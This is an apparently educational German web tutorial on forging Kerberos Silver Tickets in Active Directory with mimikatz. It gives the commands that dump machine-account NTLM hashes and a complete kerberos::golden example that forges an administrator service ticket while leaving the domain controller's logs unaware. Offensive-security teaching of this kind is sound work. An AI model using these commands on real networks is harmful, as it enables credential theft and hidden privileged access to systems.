Active Directory Hacking: Angriffe mit mimikatz - Kerberos Silver Tickets

Active Directory Hacking: Angriffe mit mimikatz - Kerberos Silver Tickets

Beitragsseiten

Kerberos Silver Tickets

Bei Silver Tickets handelt es sich ebenfalls um künstlich erzeugte Tickets, doch im Gegensatz zu der „Golden Ticket“ Variante werden dabei keine Ticket Granting Tickets (TGT), sondern Service Tickets erzeugt. Um ein Silver Ticket zu erzeugen, muss der Angreifer im Besitz des Maschinen-Accounts (des anzugreifenden Zielsystems) sein. Ist dies der Fall, kann er sich Service-Tickets (mit beliebigem Benutzernamen und beliebiger Berechtigung) für das Zielsystem erstellen, ohne mit dem Domain Controller kommunizieren zu müssen. Deshalb ist es bei einem Angriff mit einem Silver Ticket möglich, auf Ressourcen zuzugreifen, ohne dabei Spuren in den Logs des Domain Controllers (DC) zu hinterlassen. Somit können ggf. Alarme auf einem SIEM-System vermieden werden.

Silver Tickets

 
Hinweis: Die Passwörter von Maschinen Accounts werden standardmäßig alle 30 Tage geändert. Deshalb ist ein gestohlener Maschinen-Account Hash maximal 30 Tage lang gültig.

Kerberos Silver Ticket Angriff durchführen

Der NTLM-Hash einer Maschine kann mit folgenden Befehlen extrahiert werden:

privilege::debug
sekurlsa::msv

sekrulsa::msv Silver Ticket

Anschließend kann mit folgendem Befehl ein Silver Ticket erzeugt werden:

kerberos::golden /domain:DOMÄME /sid:SID /rc4:RC4 /target:TARGET /user:USER /groups:GROUPS /ptt

Ein vollständiger Befehl könnte also z. B. so aussehen:

kerberos::golden /domain:whitehat.de /sid:S-1-5-21-3913518516-653834210-1034227736 /rc4:9c9e89b592c80e2e13f5695953709271 /target:fileserver.whitehat.de /user:Administrator /groups:512,513,518,519,520 /ptt

kerberos::golden Silver Ticket


1000 Zeichen übrig


Haftungsausschluss
«Nur wer versteht, wie Angreifer handeln, kann effektive Schutzmaßnahmen treffen.»

Die hier zur Verfügung gestellten Informationen dienen ausschließlich zu Lern- und Forschungszwecken. Der Missbrauch dieser Informationen kann zu strafrechtlichen Konsequenzen führen. Wir raten dringend hiervon ab und übernehmen keinerlei Haftung für etwaige Schäden.

Folge WhiteHat.de